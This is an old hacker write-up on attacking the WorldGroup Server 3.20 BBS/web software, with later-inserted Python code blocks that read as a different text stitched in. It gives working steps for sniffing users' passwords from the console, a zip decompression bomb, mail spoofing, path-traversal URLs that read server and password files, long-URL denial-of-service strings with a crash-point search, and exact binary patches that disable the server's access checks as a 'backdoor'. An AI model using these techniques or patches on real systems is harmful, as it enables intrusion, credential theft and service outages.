[WORLDGROUP SERVER ver. 3.20 for WiN9x/ME/NT/2000 Security overview]
Written 2001/03/01, 13:46:50; I decided to post it on 2002/01/12, 16:54:00


Maybe you know about the Worldgroup server software from the Galacticomm company
(http://gcomm.com). One of the most popular hosts running that software is
jungle.net. WGserver supports these services: www, ftp, pop3, smtp, irc, telnet,
rlogin, nntp, client/server, dialup server. It installs on Windows 9x/NT/ME/2000;
on Windows NT it runs as a service. The makers of this software follow a
closed-source policy, and to make any addon or plugin you need specific
libraries for VB/BC, and buying those libs costs a lot of money...
Sooo, whoever didn't know what the fucking WG is now knows it ;)
This story began on the #wghack channel, where one of my friends would ask me
from time to time about bugs in the WG software, but my answer "YES!" did not
inspire him. And so it all began again, and I started analysing this big monster...
I decided to reject all bugs connected with configuration, because he asked me
about vulnerabilities that would be present on any host running wgserver v3.20.
Heh, a lot of *.dll files, hmm... I will explore them after the terminal testing...
I ran WG and telnetted into the terminal, then began testing every module
for known mistakes. All my actions were written to a log file and an audit file.
I also decided to make a real-time log of my own traffic in traffic.txt :)
How did I do this!? It's easy! From START->RUN run regedit, then go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Galacticomm\Worldgroup\3.00\Settings
and change UseConsoleWindow from 0 to 1. Then restart WG, and we see the old-style
console with terminal emulation; open any user's terminal emulation and press
CTRL+L, and we have a full dump of that user's traffic :) Very nice if you are an
evil admin and want to grab users' internet passwords; useful if the system uses
PPP mode for dialup users.
OK, I am in the TOP MENU of the system; the first thing I want to test is command
strings. Their limit ranges from 256 to 512, depending on the system configuration.
Hmm, maybe I am a bad tester, but I couldn't find anything interesting (I mean in
the standard modules). I know about some addons which crash after a long or
malformed string. For example, I can hang any user in the terminal teleconference,
but that's not interesting: just send a lot of garbage...
Then I began testing the functions of the different modules. Not so interesting...
I can fake any email from the terminal, just by using colours and ANSI graphics
with ANSI animation elements. Another trick is in the Library module, with ANSI
graphics too: again faked info. The Library module understands zips, and after
an upload the lib module unzips the file and unpacks file_id.diz. That file has
long been used for archive descriptions. First I played with a zip file carrying
zero information: a big file of binary zeros, 2 gigs, which after compression was
very small, but after unpacking.... :)) If your system has little memory,
say bye-bye... Then I played with ANSI in file_id.diz, and the user can see
very fun pictures and other messages about the fucking world. Hmm, can anybody
make a file_id.diz with a faked system variable!? I think the terminal modules
have been in use for more than a year and all the big mistakes have already been
found, so I decided to try to find bugs in the new modules for old services,
like WWW and others.
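The Library-module zip trick above is the classic decompression bomb: a member that costs almost nothing on the wire but inflates to whatever the attacker declares. Added example, not the page's or Galacticomm's code: it builds such a zip in memory (streaming, so the zeros never exist at once, which is why the trick is cheap for the sender), shows what the central directory declares versus what the archive actually occupies, and then does the check an unpacker should do before inflating an upload: refuse by declared size and by ratio, and cap the bytes actually produced, because the header is attacker-controlled too. The sizes, the limits and the member name file_id.diz are this example's own choices.

```python
import io
import zipfile


def make_zero_zip(uncompressed_size, name="file_id.diz", chunk=1 << 20):
    """Build an in-memory ZIP whose only member is `uncompressed_size` zero bytes.
    The zeros are streamed in `chunk`-sized pieces, so a multi-gigabyte member
    needs only `chunk` bytes of RAM to produce; inflating it is another matter."""
    buf = io.BytesIO()
    zeros = bytes(chunk)
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        with zf.open(name, "w") as member:
            remaining = uncompressed_size
            while remaining > 0:
                n = min(chunk, remaining)
                member.write(zeros[:n])
                remaining -= n
    return buf.getvalue()


def declared_sizes(data):
    """Read the central directory only (nothing is inflated) and return
    (declared uncompressed total, stored compressed total, ratio)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        unc = sum(i.file_size for i in zf.infolist())
        comp = sum(i.compress_size for i in zf.infolist())
    return unc, comp, (unc / comp if comp else float("inf"))


def member_verdict(data, name, max_bytes=64 * 1024, max_ratio=200):
    """Decide from the headers alone whether `name` may be inflated.
    Returns "ok" or a string starting with "refused:" saying why."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        try:
            info = zf.getinfo(name)
        except KeyError:
            return "refused: no such member"
    if info.file_size > max_bytes:
        return f"refused: declares {info.file_size} bytes, limit is {max_bytes}"
    if info.compress_size and info.file_size / info.compress_size > max_ratio:
        return f"refused: ratio {info.file_size // info.compress_size}:1 exceeds {max_ratio}:1"
    return "ok"


def safe_read_member(data, name, max_bytes=64 * 1024, max_ratio=200):
    """Inflate `name` only after member_verdict() accepts it, and stop reading at
    max_bytes regardless: file_size in the header can lie, so the real guard is
    the cap on bytes actually produced."""
    verdict = member_verdict(data, name, max_bytes, max_ratio)
    if verdict != "ok":
        raise ValueError(f"{name}: {verdict}")
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        out = member.read(max_bytes + 1)
    if len(out) > max_bytes:
        raise ValueError(f"{name}: inflated past {max_bytes} bytes despite its header")
    return out


if __name__ == "__main__":
    bomb = make_zero_zip(64 * 1024 * 1024)  # 64 MiB of zeros, constructed here
    unc, comp, ratio = declared_sizes(bomb)
    print(f"archive is {len(bomb)} bytes, declares {unc} bytes ({ratio:.0f}:1)")
    print(member_verdict(bomb, "file_id.diz"))
    print(safe_read_member(make_zero_zip(512), "file_id.diz", max_ratio=10**6)[:4])
```

The ratio test alone is not enough (a legitimate text file compresses well), and the size test alone is not enough (the header is written by the sender); the cap on bytes actually read is the check that holds even when both headers are forged.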
Heh, OK, let's go! SMTP/FTP/IRC have non-critical bugs, like SPAM support,
being able to kick any WG user from any IRC server, and mail faking without a
correct reply address. Those bugs are nothing... just for fooling users :)
The FTP server is fun too, because some big files with a national code page are
not listed or are hidden. SMTP supports modes 1 and 2. Mode 1 is mailing without
login: you can send email from any address with any FROM field. The IRC client
really sucks: it supports commands from the module only and uses IRC server
messages for user status. For example: if I sit with my friend from the WG IRC
client on one IRC server with nickname error66 and do /msg Sexy Heya!, user Sexy
will be kicked from the IRC server by the WG client. You can do it on a channel
for more effect :)
Then I looked into my log files with my own actions and the system's answers.
Very often I saw messages about buffer overflows. Damn, that's very interesting,
and with more enthusiasm I began to test the new modules of the WEB interface.
Hmm, a big job, and I tested every module one by one. I saved pages and changed
the length of forms and fields, then POSTed them to my poor WG server ;)
Damn, the guys from gcomm put code in galacth.dll that cuts off everything
longer than 256 symbols. Time to use the head =)) I downloaded IDA Pro from a
warez ftp. Hmm, the system has more than 30 *.DLLs and I needed to choose the
DLL holding the security-policy code. Looking into the logs, I saw many messages
about errors in WWW. I remembered the error messages and found them in
galwebd.dll and galacth.dll. Galwebd.dll checks for "..", for example:
http://www.cool.com/....../autoexec.bat.
Galacth.dll controls many important static and dynamic variables.
You can see them with F3 in FAR. Damn, the software looked strong, but after
requesting different extensions I saw something interesting...
I began testing the modules one by one with "a.a":
http://www.cool.com/a.a
http://www.cool.com/email/a.a
http://www.cool.com/polls/a.a
http://www.cool.com/account/a.a
http://www.cool.com/singup/a.a
etc...
Some modules gave me this in the browser window:
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
3 steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
Default w/table
No, the server did not crash, but already I could see some useful info. The path
to the web server was still not interesting for me. What mattered was that my
requests were being put through checks for bugs, and that the system's support
for dynamic files suited me. All the fun and interesting stuff lay beyond 256
symbols. I tried to crash the server, and did it on Windows 95/98/ME.
Maybe WG uses functions of the installed system; that is not the best way...
Denial of Service:
http://www.cool.com/signup/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A
After that I continued experiments with file access. But before that I loaded
IDA Pro: I had to know all the possibilities of this bug and what would be written
out if there was an error. After some minutes I knew that some WWW modules of WG
handle the dot symbol badly:
http://127.0.0.1/signup/!.
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!, 
3 steps
     1. TABLE BEGINS 1230259009-2527171203(1296912195) 49544341-96a19283(4d4
d4f43)
     2. COLUMN, ID#0: LISTITEM 1734109300-3704607956(1970498657) 675c6874-dccfd
4d4(75736c61), LISTITEM 1550344560-3251425240(1701080681) 5c686170-c1cccfd8(656
46e69)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!, Sign-up
 form
http://127.0.0.1/signup/.!
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!,
 3 steps
      1. TABLE BEGINS 0-3(4) 0-3(4)
      2. COLUMN, ID#0: LISTITEM 1380998202-2476909448(1095911247) 52505c3a-
93a2a388(4152474f), LISTITEM 0-1548961099(1548961100) 0-5c53454b(5c53454c)
      3. TABLE ENDS 7733528-1402360172(1394626645) 760118-5396516c(53205055)
      4. END OF MAP: 29-7733476(7733448) 1d-7600e4(7600c8)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!, 
Sign-up form
I tried this string:
http://127.0.0.1/signup/.!/..../wow.html
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, 3 steps
      1. TABLE BEGINS 1230259009-2527171203(1296912195) 49544341-96a19283
(4d4d4f43)
      2. COLUMN, ID#0: LISTITEM 7105908-1977604564(1970498657) 6c6d74-75dfd9d4
(75736c61), LISTITEM 1550344560-3251425240(1701080681) 5c686170-c1cccfd8(65646e69)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, Sign-up form
Hmm, this is more interesting =) Since this file does not exist, I decided
to use the name of an existing file, for example wgserver.exe:
http://127.0.0.1/signup/.!/..../wgserver.exe
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wgserver.exe, 3 steps
      1. TABLE BEGINS (0)
      2. COLUMN, ID#0: LISTITEM 153-4128920(4128768) 99-3f0098(3f0000), 
LISTITEM 0-91(92) 0-5b(5c)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Symbol missing or out of order: LISTITEM
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wgserver.exe, Sign-up 
form
Heh, very nice. The system is ready to return the file to us, but cannot find it
in the variable list of this module:
Symbol missing or out of order: LISTITEM
A little below I explain how this happens...
I tested module after module and stopped on POLLS:
http://127.0.0.1/polls/index./..../galpmah.msg
This string returned to me the whole text of the galpmah.msg file.
You must be a registered user, or you can't get into the POLLS module.
The higher your access level in the WG system, the more LISTITEMs you get.
I tried again and again and got my own *.pwl files, but this way worked on
Windows 95/98/Millennium. It was of interest to check this on Windows NT 4.0 +
service pack 6 (eng). The trick did not work on NT. Strangely, the dot bug
worked, but I could not gain access to higher directories (beyond the directory
of the one buggy module). The server reported that it was not possible to open
the required file. I think WGS uses several other *.exe and *.dll files on the
NT platform. Time to find something more interesting. I wrote a small scanner
which generates requests of different lengths for each module.
After scanning, I found this:
-----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile c:\wgserv\<name of module>\<trick string>\<link to file>, 3 steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open c:\wgserv\<name of module>\<trick string>\<link to file>
, in c:\wgserv\<name of module>\<trick string>\<link to file>
-----------------------------------------------------------------------------
You can get a Blue Screen of Death if your server has weak hardware. You need
to send some requests with a certain frequency and a certain request length.
For example:
http://Server/signup/AAAAAA (from 230 to 512 A's) AAAA.A or
http://Server/signup/AAAAAA (from 230 to 512 A's) AAAAA.A
To find the point of death more easily, add one "A" to each request until
the server gives this message:
-----------------------------------------------------------------------------
DynaFile c:\wgserv\<name of module>\<trick string>\<link to file>, XXX steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open , in 
-----------------------------------------------------------------------------
Now take one "A" away from our request and we have the point of death.
DoS = http://server/bugged module/(AAAAA....AAA.A)-A
An easy way to do this is to make a CGI scanner with big and varied DoS strings.
Start it and wait for the result; if the server is not dead, the server is lucky :)
Often the TCP/IP channels hang and the server can't answer new requests,
and the administrator must reset the channels from the console.
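The probe URLs, the "Error priming map" pages and the add-one-A-until-it-breaks procedure above can be turned into a small tool. Added example, not the author's scanner and not Galacticomm code: it builds the module-relative probes, parses an error page into the resolved DynaFile path and the trailing "Can't open" line, tells whether the resolved path has left the module tree (the signal that the '.' trick worked), and runs the length search. The two sample pages are copied from this text. The fake server is a constructed stand-in that only reproduces what the text reports (the resolved path is echoed back; the echo goes empty once the request exceeds a 256-byte cut), so the length it yields is the stand-in's, not a measurement of WorldGroup; against a live host, replace it with a function that does the HTTP GET and returns the body.

```python
import re

# Two "Error priming map" pages copied from this text: one resolved inside the
# module tree (galacth\galuieah), one where the '.' trick walked out of it.
SAMPLE_INSIDE = r"""Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
3 steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
Default w/table"""

SAMPLE_ESCAPED = r"""Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, 3 steps
      1. TABLE BEGINS 1230259009-2527171203(1296912195) 49544341-96a19283
(4d4d4f43)
      3. TABLE ENDS (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, Sign-up form"""


def probe_url(host, module, trick, target):
    """One of the text's module-relative probes, e.g. trick ".!" and target
    "..../wgserver.exe" give http://host/signup/.!/..../wgserver.exe."""
    return f"http://{host}/{module}/{trick}/{target}"


def parse_dynafile_error(body):
    """Pull the server-side facts out of an 'Error priming map' page: the
    resolved DynaFile path, the step count, and the (possibly empty) path and
    form name from the trailing "Can't open X, in X, form" line. The page
    wraps these over several lines, so it is flattened first. Returns None
    when the body is not such a page."""
    flat = " ".join(line.strip() for line in body.splitlines())
    dyna = re.search(r"DynaFile (.*?), (\d+|XXX) steps", flat)
    if not dyna:
        return None
    cant = re.search(r"Can't open (.*?) ?, in ([^,]*?)(?:, (.*))?$", flat)
    return {
        "dynafile": dyna.group(1),
        "steps": dyna.group(2),
        "cant_open": cant.group(1) if cant else None,
        "form": cant.group(3) if cant else None,
    }


def escaped_module_dir(resolved_path, module_root="\\galacth\\"):
    """True when the path the server resolved no longer lies under the
    web-module tree, i.e. the traversal got out."""
    return module_root.lower() not in resolved_path.lower()


def find_death_point(send, host, module, start=230, stop=512):
    """The text's procedure: lengthen the A-string one byte at a time until the
    error page stops echoing a path (the 256-byte cut), then back off one.
    `send(url)` must return the response body as text."""
    for n in range(start, stop + 1):
        parsed = parse_dynafile_error(send(f"http://{host}/{module}/{'A' * n}.A"))
        if parsed is not None and parsed["cant_open"] == "":
            return n - 1
    return None


def fake_wg_server(url, cut=256):
    """Constructed stand-in for the offline demo, not WorldGroup. It reproduces
    only what the text reports: the resolved path is echoed back, and once the
    request path exceeds `cut` bytes the echo is empty ("Can't open , in ")."""
    request_path = url.split("/", 3)[3]
    resolved = "" if len(request_path) > cut else "c:\\wgserv\\" + request_path.replace("/", "\\")
    return ("Error priming map. See below.\n"
            f"DynaFile {resolved}, 3 steps\n"
            "      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)\n"
            f"Can't open {resolved}\n, in {resolved}, Sign-up form")


if __name__ == "__main__":
    for sample in (SAMPLE_INSIDE, SAMPLE_ESCAPED):
        p = parse_dynafile_error(sample)
        print(p["dynafile"], "->", "ESCAPED" if escaped_module_dir(p["dynafile"]) else "inside")
    print(probe_url("127.0.0.1", "signup", ".!", "..../wgserver.exe"))
    print("point of death (stand-in):", find_death_point(fake_wg_server, "server", "signup"))
```

The useful part for a defender is the parser: any response that echoes a filesystem path outside the module tree is the traversal succeeding, and the same regexes run over saved server logs find past attempts.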
Now let's analyse how the URL request handler works. Part of the WEB
security lives in galacth.dll; this library rejects everything that in its
opinion is not trustworthy. This can be seen from the messages stored inside
the library.

Loading galacth.dll in IDA Pro, we see interesting strings:
a403Forbidden   db '403 Forbidden',0   
aGalacthSuspend db 'galacth/suspend.htm',0
a401Unauthorize db '401 Unauthorized',0
aWwwAuthenticat db 'WWW-Authenticate',0
aGalacthUnauth_ db 'galacth/unauth.htm',0
aGalacthLogin_h db 'galacth/login.htm',0
Let's find the piece of code for these strings. Press alt+t, enter
a403Forbidden, and find:
CODE:004063FB   push    offset a403Forbidden
This is the preparation for outputting the message; go to the top of the
function and look for what jumps to offset 4063FB.
Below in the program code we see the jump to our message.
;The jump depends on the value in eax.
CODE:004063C1  add     eax, 4          ; switch 6 cases
CODE:004063C4  cmp     eax, 5
CODE:004063C7  ja      loc_0_4065CD    ; default
CODE:004063CD  jmp     ds:off_0_4063D4[eax*4] ; switch jump
Jump table:
Our -> CODE:004063D4   dd offset loc_0_4063FB  ; jump table for switch
CODE:004063D4      dd offset loc_0_4065CD
CODE:004063D4      dd offset loc_0_406435
CODE:004063D4      dd offset loc_0_4065CD
CODE:004063D4      dd offset loc_0_4065CD
We have come to the dispatch that is taken if, for some reason, our
request did not pass. This piece of the subroutine is at offset 4063AA.
Moving up in the code, we see how the check happens.
CODE:004063AA loc_0_4063AA:           ; CODE XREF: acthSession
CODE:004063AA    mov     edx, [ebx+10h]
CODE:004063AD    push    edx
CODE:004063AE    mov     ecx, [edx]
CODE:004063B0    call    dword ptr [ecx+4]
CODE:004063B3    pop     ecx
CODE:004063B4    mov     esi, eax
CODE:004063B6    push    dword ptr [ebx+10h]
CODE:004063B9    call    @acthSynthesis@postproceed$qv ; acthSynt
CODE:004063BE    pop     ecx
CODE:004063BF    mov     eax, esi
CODE:004063C1    add     eax, 4          ; switch 6 cases
CODE:004063C4    cmp     eax, 5
CODE:004063C7    ja      loc_0_4065CD    ; default
It is still hard to say how the check happens, but we already know which
registers are used. Moving further up the code, we need to find the call to
this subroutine at offset 4063AA:
CODE:00406394 loc_0_406394:                       ; CODE XREF: acthSession
CODE:00406394      cmp     dword ptr [ebx+10h], 0
---->CODE:00406398    jnz     short loc_0_4063AA
CODE:0040639A      push    ebx
CODE:0040639B      mov     ecx, [ebx+0Ch]
CODE:0040639E      push    ecx
CODE:0040639F      mov     eax, [ecx]
CODE:004063A1      call    dword ptr [eax+1Ch]
CODE:004063A4      add     esp, 8
CODE:004063A7      mov     [ebx+10h], eax
See the conditional jump to our offset (jnz short loc_0_4063AA),
but the comparison (cmp dword ptr [ebx+10h], 0) is rather strange, and I think
we need to move further up the code and find what calls this piece of code
at offset CODE:00406394.
Moving this way we reach the top of this cascade of checks, this code:
(Later it will be seen that I went the wrong way... )
(You will see it too. The way of mistakes is the way of education ;> )
CODE:00406352  cmp     word ptr [ebx+34h], 0
-->CODE:00406357  jz      loc_0_4065EE
CODE:0040635D  push    dword ptr [ebx+30h]
CODE:00406360  call    sub_0_41416C
CODE:00406365  pop     ecx
CODE:00406366  test    al, al
---->CODE:00406368  jnz     short loc_0_406380
CODE:0040636A  mov     ax, 1
CODE:0040636E  mov     edx, [ebp+var_14C]
CODE:00406374  mov     large fs:0, edx
CODE:0040637B  jmp     loc_0_406622
The jump looks like the right one, but after the change the server gave me
Forbidden on the request http://server/..../boot.ini. Let's look at our logs...
In the log files we see that the server raised an alert on "..". Remember old DOS!?
cd .. or cd ../../dos6.22  That's it! This check lives in galwebd.dll ;)
Heh, loading galwebd.dll in IDA Pro and searching for the string "..":
DATA:004054E6 a__             db '..',0
The constant '..' is laid down in the data segment at offset 4054E6. We again
move upward (searching up or backward):
CODE:00402FC5     push    ebp
CODE:00402FC6     mov     ebp, esp
CODE:00402FC8     push    ebx
CODE:00402FC9     mov     ebx, [ebp+arg_0]
Yeah, this is our offset!
--> CODE:00402FCC push    offset a__
The value a__ is pushed on the stack, to be taken from the stack later for
checking the request for "..", e.g. http://SERVER/..../boot.ini.
Moving down (forward), look at what follows push offset a__:
CODE:00402FD1     push    ebx
The program again saves something on the stack. Look further below... :)
Call of the first subroutine that checks for a prohibited path to the file.
This is because the URL must not leave the range defined in memory.
For example, our server has c:\wgserv\webpages\index.html,
available as http://server/index.html,
so the directory c:\wgserv\webpages must be the root directory of the WEB server.
Our call:
-->CODE:00402FD2     call    j__strstr
This does not interest us...
CODE:00402FD7     add     esp, 8
Aha, here is something interesting:
after j__strstr returns, the result of processing the request we sent to the
server is checked.
CODE:00402FDA     test    eax, eax
The test instruction sets flag ZF to 1 or 0 depending on the result (strstr
returns a pointer when ".." was found and 0 otherwise). JNZ jumps when ZF is 0,
i.e. when ".." was found. I can't see which flags will be set for one URL or
another, but we can look at what lies at offset short loc_0_402FF9.
CODE:00402FDC     jnz     short loc_0_402FF9
Here is what IDA Pro finds for us at this offset:
CODE:00402FF9 loc_0_402FF9:                       ; CODE XREF: _badfspec+1
CODE:00402FF9                                         ; _badfspec+26j
CODE:00402FF9     push    ds:dword_0_405D70
CODE:00402FFF     call    j__setmbk
CODE:00403004     pop     ecx
CODE:00403005     push    ebx
CODE:00403006     push    22h
Output of the error message to the browser.
->CODE:00403008     call    _byeweb
CODE:0040300D     add     esp, 8
Shutdown of the WEB interface.
->CODE:00403010     call    j__rstmbk
CODE:00403015     mov     ax, 1
CODE:00403019     pop     ebx
CODE:0040301A     pop     ebp
Return from the subroutine:
->CODE:0040301B     retn
jnz short loc_0_402FF9 goes to offset loc_0_402FF9 if the URL sent to the server
is forbidden or invalid. We know that the '..' check happens here, so this jump
needs to be changed, and then our request http://server/..../boot.ini will work.
Load galwebd.dll in hiew.exe, go to file offset 000025DC, change 751B to 9090,
and our backdoor is ready (see backdoor.asm in Bonus #1 below).

==============================Understanding=================================
Time to return to galacth.dll for a full understanding of the code inside.
This DLL must answer our question of whether the requested file is sent
(over http) or not. For example, I have the web server directory (c:\wgserv)
with the file test.htm and I want to get it. For testing I chose the account
module of the WEB interface: http://127.0.0.1/account/index.\....\test.htm
I try to get the file through the dot bug I found (server/.\file),
and get this answer:
-----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile C:\wgserv\test.htm, 3 steps
      1. TABLE BEGINS 65-7733584(7733520) 41-760150(7768768)
      2. COLUMN, ID#2: LISTITEM 1095911247-2325243803(1229332557) 
4152474f-8a98679b(4946204d), LISTITEM 1548961100-2644477586(1095516487) 
5c53454c-9d9f8692(414c4147)
      3. TABLE ENDS 92-113(22) 5c-71(16)
      4. END OF MAP: 7733520-15467039(7733520) 760110-ec021f(760110)
Symbol missing or out of order: LISTITEM
, in C:\wgserv\test.htm, Default w/table
-----------------------------------------------------------------------------
Maybe we should find the code that outputs "Error priming map. See below." and
look at what it does. In galacth.dll we find the address of this message.
//p.s. Again IDA Pro//
Here it is:
DATA:0041C4BB aErrorPrimingMa db 'Error priming map.  See below.',0
We need to find the reference to this string. Here it is:
CODE:004024BC                 push    offset aErrorPrimingMa
This is the full piece of the subroutine that pushes the message (push offset
aErrorPrimingMa):
CODE:0040249A loc_0_40249A:                        ; CODE XREF: dnfHandler:
CODE:0040249A                                      ; DATA XREF: dnfHandler:

Some value is pushed on the stack. Is it the name of the requested file? :)
CODE:0040249A   push    dword ptr [ebx+4] ; case 0x2

Call of the subroutine which decides whether the file can be sent to the user or not.
CODE:0040249D   call    @dnfMap@primeDo$qv ; dnfMap::primeDo(voi
CODE:004024A2   pop     ecx
Testing the result of the subroutine; the outcome is in flag ZF.
CODE:004024A3   test    ax, ax
I don't know 100% what ZF will be; it depends on the filename.
But I can say that if I request a prohibited file, the jump is not taken.
I know it because I have already seen all the later calls, just garbage for your
head, nothing more... So, if we request a file and this file is not in
the memory map (Error priming map) of normal files for download, the
jump to offset 4026D6 is not taken. Maybe this is more interesting:
CODE:004024A6   jnz     loc_0_4026D6    ; default
OK, let's go down the code and maybe we find something interesting :)
Register EDX is loaded from [ebx+4], again part of our
URL string.
CODE:004024AC   mov     edx, [ebx+4]
Testing the value.
CODE:004024AF   cmp     dword ptr [edx+28h], 3
Aha, look at the code below.....
This is the jump we need.
If the jump is not taken, we see the message "Error priming map.
See below."; if it is, we see something else. =)
--->CODE:004024B3   jnz     short loc_0_4024E6
To check our theory, let's correct this piece of code in galacth.dll,
and possibly we will not see anything like "NO ACCESS" anymore =))
I'll help and tell you the real file offset for hiew.exe: 00001AB3.
OK, now change jnz to jmp, from 7531 to EB31.
This part of the code shows what happens if the jump is not
taken.
CODE:004024B5   push    dword ptr [ebx+4]
CODE:004024B8   mov     edi, [ebx]
CODE:004024BA   push    0
CODE:004024BC   push    offset aErrorPrimingMa
CODE:004024C1   push    edi
CODE:004024C2   call    j_@ostream@outstr$qpxct1 ; ostream::outs
CODE:004024C7   add     esp, 0Ch
CODE:004024CA   push    edi
CODE:004024CB   call    j_@endl$qr7ostream ; endl(ostream &)
CODE:004024D0   pop     ecx
CODE:004024D1   push    eax
CODE:004024D2   call    @$blsh$qr7ostreamr6dnfMap ; operator<<(o
CODE:004024D7   add     esp, 8
CODE:004024DA   mov     dword ptr [ebx+0Ch], 5
CODE:004024E1   jmp     loc_0_4026D6    ; default

OK, run the server and see what interesting things it writes to us.
I decided to check the bug in the modules which before did not give me files
but returned this message:
----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile c:\wgserv\zip2exe.exe, 3 steps
      1. TABLE BEGINS 65-7733584(7733520) 41-760150(760110)
      2. COLUMN, ID#2: LISTITEM 1095911247-2325243803(1229332557) 
4152474f-8a98679b(4946204d), LISTITEM 1548961100-2644477586(1095516487)
 5c53454c-9d9f8692(414c4147)
      3. TABLE ENDS 92-113(22) 5c-71(16)
      4. END OF MAP: 7733520-15467039(7733520) 760110-ec021f(760110)
Symbol missing or out of order: LISTITEM
----------------------------------------------------------------------------
Now, on the request http://server/signup/./.../zip2exe.exe, the server returns:
-----------------------------------------------------------------------------
Symbol missing or out of order: LISTITEM , in c:\wgserv\zip2exe.exe, 
Sign-up form
------------------------------------------------------------------------------
OK, now we know that the request check consists of several parts,
as we expected at the very beginning. Heh, very interesting to find
one more part of the check. Again load galacth.dll in IDA Pro and
find the string "Symbol missing or out of order:" at address 41C56D:
DATA:0041C56D aSymbolMissingO db 'Symbol missing or out of order: ',0
Now find the reference to aSymbolMissingO at address 402DAE:
CODE:00402DAC loc_0_402DAC:
CODE:00402DAC    push    0
--->CODE:00402DAE   push    offset aSymbolMissingO
CODE:00402DB3    push    esi
CODE:00402DB4    call    j_@ostream@outstr$qpxct1
CODE:00402DB9    add     esp, 0Ch
CODE:00402DBC    push    0
CODE:00402DBE    push    edi
CODE:00402DBF    push    esi
CODE:00402DC0    call    j_@ostream@outstr$qpxct1
CODE:00402DC5    add     esp, 0Ch
CODE:00402DC8    push    esi
CODE:00402DC9    call    j_@endl$qr7ostream
CODE:00402DCE    pop     ecx
CODE:00402DCF    push    ebx
CODE:00402DD0    call    @dnfMap@closein$qv
CODE:00402DD5    pop     ecx
CODE:00402DD6    xor     eax, eax
CODE:00402DD8    jmp     loc_0_402EEC
This is the full piece of the subroutine code.
We see that there is no jump here, only calls, which do not interest us.
We need to find the call of this subroutine; for that we need to find
a reference to offset loc_0_402DAC.
And certainly we find it; here is that piece of code:
CODE:00402D9F    jz      short loc_0_402DA9
CODE:00402DA1    mov     esi, [ebx+24h]
CODE:00402DA4    add     esi, 3Eh
CODE:00402DA7    jmp     short loc_0_402DAC
CODE:00402DA9    mov     esi, [ebx+24h]
We see that this fragment is still only responsible for output of the message,
so we need to move up the code. But since this code is part of a big subroutine,
we need to find the beginning of the subroutine and then search for the calls
to its offset. Here is the upper part of the subroutine:
CODE:00402D50 loc_0_402D50:                           ; CODE
CODE:00402D50   mov     edx, [ebx+8]
CODE:00402D53   add     edx, 44h
CODE:00402D56   push    edx
CODE:00402D57   call    j_@istream@tellg$qv 
CODE:00402D5C   pop     ecx
CODE:00402D5D   mov     [ebp+var_4], eax
CODE:00402D60   push    100h
